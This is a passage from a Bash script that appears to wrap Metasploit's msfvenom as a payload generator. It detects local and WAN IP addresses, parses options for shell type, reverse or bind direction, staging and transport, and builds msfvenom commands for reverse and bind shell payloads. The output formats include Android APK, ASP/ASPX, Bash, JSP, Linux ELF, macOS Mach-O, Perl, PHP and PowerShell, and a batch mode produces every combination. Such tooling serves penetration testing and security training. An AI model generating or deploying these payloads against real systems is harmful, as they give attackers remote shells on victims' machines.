286 | ## cURL/wget installed?
287 | if [[ -n "$( \which curl )" || -n "$( \which wget )" ]]; then
288 | ## Try and get external IP
289 | WAN=""
290 | [[ -n "$( \which curl )" ]] \
291 | && CMD="\curl -s --max-time 3" \
292 | || CMD="\wget -U 'curl' --connect-timeout 3 -qO-"
293 | for url in 'http://ipinfo.io/ip' 'http://ifconfig.io/'; do
294 | WAN=$( eval ${CMD} "${url}" )
295 | [[ -n "${WAN}" ]] \
296 | && break
297 | done
298 | [[ "${VERBOSE}" == "true" && -z "${WAN}" ]] \
299 | && echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't get external WAN IP${RESET}" >&2
300 | fi
301 |
302 | ## Is there a writeable path for us?
303 | if [[ ! -d "${OUTPATH}" ]]; then
304 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Unable to use ${OUTPATH}${RESET}" >&2
305 | exit 3
306 | fi
307 |
308 |
309 | ## Get default values (before batch/loop)
310 | [[ -z "${PORT}" ]] \
311 | && PORT="443"
312 |
313 | ## Get NIC information
314 | if [[ "$DARWIN" = "true" ]]; then # OSX users
315 | IFACE=( $( for IFACE in $( \ifconfig -l -u | \tr ' ' '\n' ); do if ( \ifconfig ${IFACE} | \grep inet 1>/dev/null ); then echo ${IFACE}; fi; done ) )
316 | IPs=(); for (( i=0; i<${#IFACE[@]}; ++i )); do IPs+=( $( \ifconfig "${IFACE[${i}]}" | \grep 'inet ' | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' ) ); done
317 | else # nix users
318 | IFACE=( $( \awk '/:/ {print $1}' /proc/net/dev | \sed 's_:__' ) )
319 | IPs=(); for (( i=0; i<${#IFACE[@]}; ++i )); do IPs+=( $( \ip addr list "${IFACE[${i}]}" | \grep 'inet ' | \cut -d' ' -f6 | \cut -d '/' -f1 ) ); done
320 | fi
321 |
322 | ## Define TYPEs/FORMATs
323 | TYPEs=( apk asp aspx bash java linux osx perl php powershell python tomcat windows ) # Due to how its coded, this must always be a higher array count than ${FORMATs}
324 | FORMATs=( sh jsp lin elf macho pl ps1 py war win exe exe-service dll )
325 |
326 |
327 | ## Check user input
328 | ## Able to detect NIC interfaces?
329 | if [[ -z "${IFACE}" ]]; then
330 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find any network interfaces${RESET}" >&2
331 | echo -e " ${YELLOW}[i]${RESET} Need to manually define an IP. ${YELLOW}${0} --ip ${RESET}" >&2
332 | exit 2
333 | fi
334 |
335 | ## Able to detect IP addresses?
336 | if [[ -z "${IPs}" ]]; then
337 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't discover IP addresses${RESET}. =(" >&2
338 | echo -e " ${YELLOW}[i]${RESET} Need to manually define it. ${YELLOW}${0} --ip ${RESET}" >&2
339 | exit 2
340 | fi
341 |
342 | ## (!!!Magic Alert!!!) Try to predict what's what with inputs...
343 | for x in $( \tr '[:upper:]' '[:lower:]' <<< "$@" ); do
344 | if [[ "${x}" =~ ^--* ]]; then true # Long argument? (skip!)
345 | elif [[ "${x}" == "list" || "${x}" == "ls" || "${x}" == "options" || "${x}" == "show" || "${x}" == "help" ]]; then HELP=true # List types? (aka help screen)
346 | elif [[ "${x}" == "verbose" || "${x}" == "v" ]]; then VERBOSE=true # Verbose?
347 | elif [[ "${x}" == "all" || "${x}" == "batch" || "${x}" == "a" ]]; then BATCH=true # Batch mode?
348 | elif [[ "${x}" == "loop" || "${x}" == "l" ]]; then LOOP=true # Loop mode?
349 | elif [[ "${x}" == "cmd" || "${x}" == "shell" || "${x}" == "normal" ]]; then SHELL="shell" # Shell?
350 | elif [[ "${x}" == "meterpreter" || "${x}" == "msf" || "${x}" == "meterp" ]]; then SHELL="meterpreter" # Meterpreter?
351 | elif [[ "${x}" == "bind" || "${x}" == "listen" ]]; then DIRECTION="bind" # Bind payload?
352 | elif [[ "${x}" == "reverse" || "${x}" == "rev" ]]; then DIRECTION="reverse" # Reverse payload? (default)
353 | elif [[ "${x}" == "staged" || "${x}" == "stager" || "${x}" == "stage" || "${x}" == "small" ]]; then STAGE=true # Staged?
354 | elif [[ "${x}" == "stag"*"less" || "${x}" == "single" || "${x}" == "inline" || "${x}" == "no"* || "${x}" == "full" ]]; then STAGE=false # Stageless?
355 | elif [[ "${x}" == "https" || "${x}" == "ssl" || "${x}" == "tls" ]]; then METHOD="https" # HTTPS payload?
356 | elif [[ "${x}" == "http" || "${x}" == "www" ]]; then METHOD="http" # HTTP payload?
357 | elif [[ "${x}" == "tcp" ]]; then METHOD="tcp" # TCP payload? (default)
358 | elif [[ "${x}" == "find"* || "${x}" == "allport"* ]]; then METHOD="find_port" # Find_Port payload?
359 | elif [[ "${x}" =~ ^-?[0-9]+$ && "${x}" -gt 1 && "${x}" -lt 65535 ]]; then PORT="${x}" # Port?
360 | elif [[ "${x}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then IP="${x}" # IP?
361 | elif [[ "${x}" == *.* ]]; then IP="${x}" # Domain/DNS? (weak detection & doesn't support hostname)
362 | elif [[ "${x}" == "wan" && -n "${WAN}" ]]; then IP="${WAN}" # WAN interface?
363 | else
364 | known=false
365 | for (( i=0; i<${#IFACE[@]}; ++i )); do [[ "${x}" == "${IFACE[${i}]}" ]] && IP="${IPs[${i}]}" && known=true && break; done # Interface? (rather than a an IP)
366 | for (( i=0; i<${#TYPEs[@]}; ++i )); do [[ "${x}" == "${TYPEs[${i}]}" ]] && TYPE="${TYPEs[${i}]}" && known=true && break; done # Type?
367 | for (( i=0; i<${#FORMATs[@]}; ++i )); do [[ "${x}" == "${FORMATs[${i}]}" ]] && TYPE="${FORMATs[${i}]}" && known=true && break; done # Type? (aka formats)
368 | [[ "${known}" == false ]] \
369 | && echo -e " ${YELLOW}[i]${RESET} Unable to detect value: ${RED}${x}${RESET}" \
370 | && exit 1 # ...if we got this far, we failed. =(
371 | fi
372 | done
373 |
374 | ## If the user defined a value, overwrite it regardless
375 | while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do
376 | opt="${1}";
377 | shift;
378 | case "$( echo ${opt} | tr '[:upper:]' '[:lower:]' )" in
379 | -|-- ) break 2;;
380 |
381 | -p|--platform )
382 | TYPE="${1}"; shift;;
383 | --platform=* )
384 | TYPE="${opt#*=}";;
385 | -t|--type )
386 | TYPE="${1}"; shift;;
387 | --type=* )
388 | TYPE="${opt#*=}";;
389 |
390 | -i|--ip )
391 | IP="${1}"; shift;;
392 | --ip=* )
393 | IP="${opt#*=}";;
394 |
395 | -p|--port )
396 | PORT="${1}"; shift;;
397 | --port=* )
398 | PORT="${opt#*=}";;
399 |
400 | -m|--msf|--meterpreter )
401 | SHELL="meterpreter";;
402 | -c|--cmd|--shell )
403 | SHELL="shell";;
404 | --shell )
405 | SHELL="${1}"; shift;;
406 | --shell=* )
407 | SHELL="${opt#*=}";;
408 |
409 | -b|--bind|--listen )
410 | DIRECTION="bind";;
411 | -r|--rev|--reverse )
412 | DIRECTION="reverse";;
413 | --direction )
414 | DIRECTION="${1}"; shift;;
415 | --direction=* )
416 | DIRECTION="${opt#*=}";;
417 |
418 | -s|--staged|--stager )
419 | STAGE=true;;
420 | --stageless )
421 | STAGE=false;;
422 | --stage )
423 | STAGE="${1}"; shift;;
424 | --stage=* )
425 | STAGE="${opt#*=}";;
426 |
427 | -t|--tcp )
428 | METHOD="tcp";;
429 | --http|--www )
430 | METHOD="http";;
431 | --https|--ssl|--tls )
432 | METHOD="https";;
433 | -f|--find|--all|--find_port|--find-port|--findport|--allports|--all-ports|--all_ports )
434 | METHOD="find_port";;
435 | --method )
436 | METHOD="${1}"; shift;;
437 | --method=* )
438 | METHOD="${opt#*=}";;
439 |
440 | -a|--all|--batch )
441 | BATCH=true;;
442 | -l|--loop )
443 | LOOP=true;;
444 |
445 | -v|--verbose )
446 | VERBOSE=true;;
447 |
448 | -h|--help|-ls|--list|--options )
449 | HELP=true;;
450 |
451 | *) echo -e " ${YELLOW}[i]${RESET} Invalid option: ${RED}${x}${RESET}" && exit 1;;
452 | esac
453 | done
454 |
455 |
456 | ## Display help?
457 | [[ "${HELP}" == true ]] \
458 | && doHelp
459 |
460 |
461 | ## Check input
462 | if [[ "${SHELL}" == "shell" || "${SHELL}" == "cmd" || "${SHELL}" == "normal" ]]; then SHELL="shell"
463 | elif [[ "${SHELL}" == "meterpreter" || "${SHELL}" == "msf" || "${SHELL}" == "meterp" ]]; then SHELL="meterpreter"; fi
464 | #else SHELL="meterpreter"; fi # <--- cant due to batch mode (same with [[ -z "${SHELL}" ]])
465 |
466 | if [[ "${DIRECTION}" == "reverse" || "${DIRECTION}" == "rev" ]]; then DIRECTION="reverse"
467 | elif [[ "${DIRECTION}" == "bind" || "${DIRECTION}" == "listen" ]]; then DIRECTION="bind"; fi
468 |
469 | if [[ "${STAGE}" == "true" || "${STAGE}" == "staged" || "${STAGE}" == "stager" || "${STAGE}" == "stage" || "${STAGE}" == "small" ]]; then STAGE='staged'; _STAGE='/'
470 | elif [[ "${STAGE}" == "false" || "${STAGE}" == "stage"*"less" || "${STAGE}" == "single" || "${STAGE}" == "inline" || "${STAGE}" == "no"* || "${STAGE}" == "full" ]]; then STAGE='stageless'; _STAGE='_'; fi
471 |
472 | if [[ "${METHOD}" == "tcp" ]]; then METHOD="tcp"
473 | elif [[ "${METHOD}" == "http" || "${METHOD}" == "www" ]]; then METHOD="http"
474 | elif [[ "${METHOD}" == "https" || "${METHOD}" == "tls" || "${METHOD}" == "ssl" ]]; then METHOD="https"
475 | elif [[ "${METHOD}" == "find"* || "${METHOD}" == "all"* ]]; then METHOD="find_port"; fi
476 |
477 | ## Did user enter an interface instead of an IP address?
478 | for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${IP}" == "${IFACE[${x}]}" ]] && IP=${IPs[${x}]} && break; done
479 |
480 | ## WAN interface?
481 | if [[ -n "${WAN}" && "${IP}" == "${WAN}" ]]; then
482 | [[ "${VERBOSE}" == "true" ]] \
483 | && echo -e " ${YELLOW}[i]${RESET} WAN IP: ${YELLOW}${WAN}${RESET} "
484 | fi
485 |
486 | ## Valued entered for IP address? Is it a valid IPv4 address? Else assume its a domain...
487 | if [[ "${IP}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then
488 | for (( i=1; i<${#BASH_REMATCH[@]}; ++i )); do
489 | (( ${BASH_REMATCH[${i}]} <= 255 )) || { echo -e " ${YELLOW}[i]${RESET} IP (${IP}) appears to be a ${RED}invalid IPv4 address${RESET} =(" >&2 && exit 3; }
490 | done
491 | elif [[ -n "${IP}" ]]; then
492 | echo -e " ${YELLOW}[i]${RESET} ${IP} isn't a IPv4 address. ${YELLOW}Assuming its a domain name${RESET}..."
493 | DOMAIN=true
494 | fi
495 |
496 | ## Valid port?
497 | if [[ "${PORT}" -lt 1 || "${PORT}" -gt 65535 ]]; then
498 | echo -e " ${YELLOW}[i]${RESET} PORT (${PORT}) is incorrect. Needs to be ${YELLOW}between 1-65535${RESET}" >&2
499 | exit 3
500 | fi
501 |
502 |
503 | ## IP menu
504 | if [[ -n "${TYPE}" && -z "${IP}" ]]; then
505 | echo -e "\n ${YELLOW}[i]${RESET} Use which ${BLUE}interface${RESET} - ${YELLOW}IP address${RESET}?:"
506 | I=0
507 | for iface in "${IFACE[@]}"; do
508 | IPs[${I}]="$( \ifconfig "${iface}" | \grep 'inet ' | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' )"
509 | [[ -z "${IPs[${I}]}" ]] \
510 | && IPs[${I}]="$( \ifconfig "${iface}" | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1 )"
511 | [[ -z "${IPs[${I}]}" ]] \
512 | && IPs[${I}]="UNKNOWN"
513 | echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}+1]${RESET}.) ${BLUE}${iface}${RESET} - ${YELLOW}${IPs[${I}]}${RESET}"
514 | I=$[${I}+1]
515 | done
516 | [[ -n "${WAN}" ]] \
517 | && I=$[${I}+1] \
518 | && echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}]${RESET}.) ${BLUE}wan${RESET} - ${YELLOW}${WAN}${RESET}"
519 | _IP=""
520 | while [[ -z "${_IP}" ]]; do
521 | echo -ne " ${YELLOW}[?]${RESET} Select ${GREEN}1-${I}${RESET}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT
522 | for (( x=0; x<${I}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP="${IPs[${x}]}"; done # Did user enter interface?
523 | [[ -n "${WAN}" && "${INPUT}" == "${INPUT}" ]] && _IP="${WAN}" # Did user enter wan?
524 | [[ "${INPUT}" != *"."* && "${INPUT}" -ge 1 && "${INPUT}" -le "${I}" ]] && _IP="${IPs[${INPUT}-1]}" # Did user select number?
525 | #for ip in "${IPs[@]}"; do [[ "${INPUT}" == "${ip}" ]] && _IP="${ip}"; done # Did user enter a known IP?
526 | [[ "${INPUT}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] && _IP="${INPUT}" # Did the user enter a IP address (doesn't valid it)
527 | IP="${_IP}"
528 | done
529 | echo ""
530 | fi
531 |
532 |
533 | ## Generate #1 (Batch/Looping)
534 | ## Loop mode?
535 | if [[ "${LOOP}" == "true" ]]; then
536 | echo -e " ${YELLOW}[i]${RESET} Loop Mode. ${BOLD}Creating one of each TYPE${RESET}, with default values"
537 | [[ "${VERBOSE}" == "true" ]] \
538 | && _VERBOSE="verbose"
539 | for (( i=0; i<${#TYPEs[@]}; ++i )); do
540 | echo "" # "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}"
541 | eval "${0}" "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" # chmod +x ${0}
542 | echo ""
543 | done # for TYPEs[@]
544 | echo ""
545 | eval "${0}" "dll" "${IP}" "${PORT}" "${_VERBOSE}" #... the odd one out!
546 | echo ""
547 | elif [[ "${BATCH}" == "true" ]]; then
548 | echo -e " ${YELLOW}[i]${RESET} Batch Mode. ${BOLD}Creating as many different combinations as possible${RESET}"
549 | [[ "${VERBOSE}" == "true" ]] \
550 | && _VERBOSE="verbose"
551 | for (( i=0; i<${#TYPEs[@]}; ++i )); do
552 | if [[ -z "${TYPE}" || "${TYPEs[${i}]}" == "${TYPE}" || "${FORMATs[${i}]}" == "${TYPE}" ]]; then
553 | type="${TYPEs[${i}]}"
554 | [[ -n "${TYPE}" && "${FORMATs[${i}]}" == "${TYPE}" ]] && type="${FORMATs[${i}]}"
555 | for shell in "meterpreter" "shell"; do
556 | if [[ -z "${SHELL}" || "${shell}" == "${SHELL}" ]]; then
557 | for direction in "reverse" "bind"; do
558 | if [[ -z "${DIRECTION}" || "${direction}" == "${DIRECTION}" ]]; then
559 | for staged in "staged" "stageless"; do
560 | if [[ -z "${STAGE}" || "${staged}" == "${STAGE}" ]]; then
561 | for method in "tcp" "http" "https" "find_port"; do
562 | if [[ -z "${METHOD}" || "${method}" == "${METHOD}" ]]; then
563 | echo "" # "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}"
564 | eval "${0}" "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" # chmod +x ${0}
565 | echo ""
566 | fi # "${method}" == "${METHOD}"
567 | done # for protocol
568 | fi # "${staged}" == "${STAGE}"
569 | done # for staged
570 | fi # "${direction}" == "${DIRECTION}"
571 | done # for direction
572 | fi # "${shell}" == "${SHELL}"
573 | done # for shell
574 | echo -e "\n"
575 | fi # "${TYPEs[${i}]}" == "${TYPE}"
576 | done # for TYPEs[@]
577 | fi
578 |
579 |
580 | ## Set default values (after batch/loop)
581 | [[ -z "${METHOD}" ]] \
582 | && METHOD="tcp"
583 | [[ -z "${DIRECTION}" ]] \
584 | && DIRECTION="reverse"
585 |
586 | ## Valid shell?
587 | if [[ -n "${TYPE}" && "${SHELL}" != "shell" && "${SHELL}" != "meterpreter" && -n "${SHELL}" ]]; then
588 | echo -e " ${YELLOW}[i]${RESET} SHELL (${SHELL}) is incorrect. Needs to be either ${YELLOW}shell${RESET} or ${YELLOW}meterpreter${RESET}" >&2
589 | exit 3
590 | fi
591 |
592 | ## Valid staged?
593 | if [[ -n "${TYPE}" && "${STAGE}" != "staged" && "${STAGE}" != "stageless" && -n "${STAGE}" ]]; then
594 | echo -e " ${YELLOW}[i]${RESET} STAGED (${STAGE}) is incorrect. Needs to be either ${YELLOW}staged${RESET} or ${YELLOW}stageless${RESET}" >&2
595 | exit 3
596 | elif [[ -n "${TYPE}" && "${_STAGE}" != "/" && "${_STAGE}" != "_" && -n "${STAGE}" ]]; then # "${STAGE}" != "" is correct
597 | echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally) with stage: ${_STAGE}.${RESET}"
598 | exit 2
599 | fi
600 |
601 | ## If its not reverse (bind), the only option is tcp (not http/https/find_ports)
602 | if [[ "${DIRECTION}" != "reverse" && "${METHOD}" != "tcp" ]]; then
603 | echo -e " ${YELLOW}[i]${RESET} Unable to use ${METHOD} with ${DIRECTION}. Please ${YELLOW}switch to reverse${RESET}" >&2
604 | exit 3
605 | fi
606 |
607 |
608 | ## Bind shell does not use LHOST
609 | LHOST=""
610 | [[ "${DIRECTION}" == "reverse" ]] \
611 | && LHOST="LHOST=${IP}"
612 |
613 |
614 | ## Generate #2 (Single Payload)
615 | ## APK
616 | if [[ "${TYPE}" == "apk" ]]; then
617 | [[ -z "${SHELL}" ]] \
618 | && SHELL="meterpreter"
619 | [[ -z "${STAGE}" ]] \
620 | && STAGE="stageless" \
621 | && _STAGE="/"
622 | [[ "${METHOD}" == "find_port" ]] \
623 | && METHOD="allports"
624 | TYPE="android"
625 | FILEEXT="apk"
626 | PAYLOAD="android/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
627 | CMD="msfvenom -p ${PAYLOAD} \\\\\n ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
628 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
629 |
630 |
631 | ## ASP
632 | elif [[ "${TYPE}" == "asp" ]]; then
633 | [[ -z "${SHELL}" ]] \
634 | && SHELL="meterpreter"
635 | [[ -z "${STAGE}" ]] \
636 | && STAGE="staged" \
637 | && _STAGE="/"
638 | [[ "${METHOD}" == "find_port" ]] \
639 | && METHOD="allports"
640 | # Can't do: stageless meterpreter - The EXE generator now has a max size of 2048 bytes, please fix the calling module
641 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then
642 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} ASP. The result is over Metasploit's ${RED}file size limit${RESET}. =(" >&2
643 | #[[ "${VERBOSE}" != 'true' ]] && exit 5 # Force pass the warning?
644 | fi
645 | TYPE="windows"
646 | FILEEXT="asp"
647 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
648 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
649 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
650 |
651 | ## ASPX
652 | elif [[ "${TYPE}" == "aspx" ]]; then
653 | [[ -z "${SHELL}" ]] \
654 | && SHELL="meterpreter"
655 | [[ -z "${STAGE}" ]] \
656 | && STAGE="staged" \
657 | && _STAGE="/"
658 | [[ "${METHOD}" == "find_port" ]] \
659 | && METHOD="allports"
660 | # Its able todo anything that you throw at it =).
661 | TYPE="windows"
662 | FILEEXT="aspx"
663 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
664 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
665 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
666 |
667 | ## Bash
668 | elif [[ "${TYPE}" == "bash" || "${TYPE}" == "sh" ]]; then
669 | [[ -z "${SHELL}" ]] \
670 | && SHELL="shell"
671 | [[ -z "${STAGE}" ]] \
672 | && STAGE="staged" \
673 | && _STAGE="/"
674 | # Can't do: meterpreter or stageless - Invalid Payload Selected
675 | # Can't do: bind option // http, https or find_port options
676 | if [[ "${STAGE}" == "stageless" ]]; then
677 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE}. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
678 | elif [[ "${SHELL}" == "meterpreter" ]]; then
679 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} Bash. There ${RED}isn't a Bash ${SHELL}${RESET}...yet?" >&2
680 | elif [[ "${DIRECTION}" != "reverse" ]]; then
681 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION}. There ${RED}isn't a ${DIRECTION} Bash${RESET}...yet?" >&2
682 | fi
683 | TYPE="bash"
684 | FILEEXT="sh"
685 | PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_bash"
686 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform unix -e generic/none -a cmd ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
687 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
688 |
689 | ## Java
690 | elif [[ "${TYPE}" == "java" || "${TYPE}" == "jsp" ]]; then
691 | [[ -z "${SHELL}" ]] \
692 | && SHELL="meterpreter"
693 | [[ -z "${STAGE}" ]] \
694 | && STAGE="staged" \
695 | && _STAGE="/"
696 | # Can't do: stageless meterpreter - Invalid Payload Selected
697 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then
698 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Java. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
699 | fi
700 | TYPE="java"
701 | FILEEXT="jsp"
702 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
703 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform ${TYPE} -e generic/none -a ${TYPE} ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
704 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
705 |
706 | ## Linux
707 | elif [[ "${TYPE}" == "linux" || "${TYPE}" == "lin" || "${TYPE}" == "elf" ]]; then
708 | [[ -z "${SHELL}" ]] \
709 | && SHELL="shell"
710 | [[ -z "${STAGE}" ]] \
711 | && STAGE="staged" \
712 | && _STAGE="/"
713 | # Can't do: stageless meterpreter - Invalid Payload Selected
714 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then
715 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Linux. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
716 | fi
717 | TYPE="linux"
718 | FILEEXT="elf" #bin
719 | PAYLOAD="${TYPE}/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
720 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
721 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
722 |
723 | ## OSX
724 | elif [[ "${TYPE}" == "osx" || "${TYPE}" == "macho" ]]; then
725 | [[ -z "${SHELL}" ]] \
726 | && SHELL="shell"
727 | [[ -z "${STAGE}" ]] \
728 | && STAGE="stageless" \
729 | && _STAGE="_"
730 | # Can't do: meterpreter or stageless - Invalid Payload Selected
731 | if [[ "${STAGE}" == "staged" ]]; then
732 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} OSX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
733 | elif [[ "${SHELL}" == "meterpreter" ]]; then
734 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} OSX. There ${RED}isn't a OSX Meterpreter${RESET}...yet." >&2
735 | fi
736 | TYPE="osx"
737 | FILEEXT="macho"
738 | PAYLOAD="osx/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
739 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
740 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
741 |
742 | ## Perl
743 | elif [[ "${TYPE}" == "perl" || "${TYPE}" == "pl" ]]; then
744 | [[ -z "${SHELL}" ]] \
745 | && SHELL="shell"
746 | [[ -z "${STAGE}" ]] \
747 | && STAGE="staged" \
748 | && _STAGE="/"
749 | # Can't do: meterpreter or stageless - Invalid Payload Selected
750 | if [[ "${STAGE}" == "stageless" ]]; then
751 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} PERL. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
752 | elif [[ "${SHELL}" == "meterpreter" ]]; then
753 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PERL. There ${RED}isn't a PERL Meterpreter${RESET}...yet." >&2
754 | fi
755 | TYPE="linux"
756 | FILEEXT="pl"
757 | PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_perl"
758 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform unix -a cmd -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
759 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
760 |
761 | ## PHP
762 | elif [[ "${TYPE}" == "php" ]]; then
763 | [[ -z "${SHELL}" ]] \
764 | && SHELL="meterpreter"
765 | [[ -z "${STAGE}" ]] \
766 | && STAGE="staged" \
767 | && _STAGE="/"
768 | # Can't do: shell - Invalid Payload Selected
769 | if [[ "${SHELL}" == "shell" ]]; then
770 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PHP. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
771 | fi
772 | TYPE="php"
773 | FILEEXT="php"
774 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
775 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform ${TYPE} -e generic/none -a ${TYPE} ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
776 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
777 |
778 | ## Powershell
779 | elif [[ "${TYPE}" == "powershell" || "${TYPE}" == "ps1" ]]; then
780 | [[ -z "${SHELL}" ]] \
781 | && SHELL="meterpreter"
782 | [[ -z "${STAGE}" ]] \
783 | && STAGE="stageless" \
784 | && _STAGE="_"
785 | [[ "${METHOD}" == "find_port" ]] \
786 | && METHOD="allports"
787 | TYPE="windows"
788 | FILEEXT="ps1"
789 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
